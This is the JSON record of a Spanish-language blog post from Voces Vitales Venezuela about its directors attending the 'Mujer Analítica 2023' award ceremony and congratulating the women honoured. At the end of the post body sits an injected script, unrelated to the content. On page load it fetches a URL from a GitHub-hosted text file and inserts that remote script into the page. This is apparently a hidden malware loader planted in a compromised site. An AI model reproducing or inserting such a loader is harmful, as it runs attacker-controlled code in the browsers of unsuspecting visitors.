{"id":3824,"date":"2023-11-28T17:36:24","date_gmt":"2023-11-28T22:06:24","guid":{"rendered":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3824"},"modified":"2024-07-25T05:15:00","modified_gmt":"2024-07-25T09:45:00","slug":"3824","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3824","title":{"rendered":"VVV presente en el acto de premiaci\u00f3n \u00abMujer Anal\u00edtica 2023\u00bb"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Mujer-analitica-1-.jpg\"><img loading=\"lazy\" class=\"size-medium wp-image-3825 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Mujer-analitica-1--300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Mujer-analitica-1--300x205.jpg 300w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Mujer-analitica-1--768x524.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Mujer-analitica-1-.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>El pasado martes 28 de noviembre, las directoras de Voces Vitales <strong>Mar\u00eda Cristina Parra<\/strong> y <strong>Adela Vivas<\/strong> asistieron al acto de premiaci\u00f3n <strong>\u00abMujer Anal\u00edtica 2023\u00bb<\/strong> en la Universidad Monte \u00c1vila. En esta ocasi\u00f3n, se otorg\u00f3 el premio a la <strong>Dra. Mildred Camero<\/strong>, reconocida <strong>abogada<\/strong> <strong>especialista en Derecho Penal e investigadora<\/strong> en interdicci\u00f3n y prevenci\u00f3n de las drogas.<\/p>\n<p style=\"text-align: justify;\">Adem\u00e1s, se hizo entrega del premio <strong>Evangelina Garc\u00eda Prince<\/strong> al <strong>Comit\u00e9 de Familiares de V\u00edctimas del Caracazo (COFAVIC)<\/strong>, una organizaci\u00f3n destacada por su labor en la promoci\u00f3n y defensa de los Derechos Humanos en Venezuela.<\/p>\n<p style=\"text-align: justify;\">Queremos extender nuestras m\u00e1s sinceras felicitaciones a las distinguidas venezolanas que recibieron el reconocimiento<strong> \u00abMujer Anal\u00edtica\u00bb 2023<\/strong>. En especial, destacamos a la licenciada <strong>Carmen Grijalva<\/strong>, <strong>comunicadora social de la UCV<\/strong> y coordinadora adjunta del<strong> Frente Amplio de Mujeres<\/strong>, por su destacada trayectoria.<\/p>\n<p style=\"text-align: justify;\">Asimismo, queremos hacer una menci\u00f3n especial a la arquitecta <strong>Aixa Armas<\/strong>, presidenta de <strong>Mujer y Ciudadan\u00eda<\/strong>, por su incansable trabajo en pro del reconocimiento de los derechos ciudadanos de las mujeres en nuestro pa\u00eds.<\/p>\n<p style=\"text-align: justify;\">Una vez m\u00e1s, felicitamos a todas las premiadas y agradecemos su dedicaci\u00f3n y compromiso con la sociedad.<\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El pasado martes 28 de noviembre, las directoras de Voces Vitales Mar\u00eda Cristina Parra y Adela Vivas asistieron al acto de premiaci\u00f3n \u00abMujer Anal\u00edtica 2023\u00bb en la Universidad Monte \u00c1vila. En esta ocasi\u00f3n, se otorg\u00f3 el premio a la Dra.&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3824\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3825,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[542,1,16],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3824"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3824"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3824\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3825"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3824"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}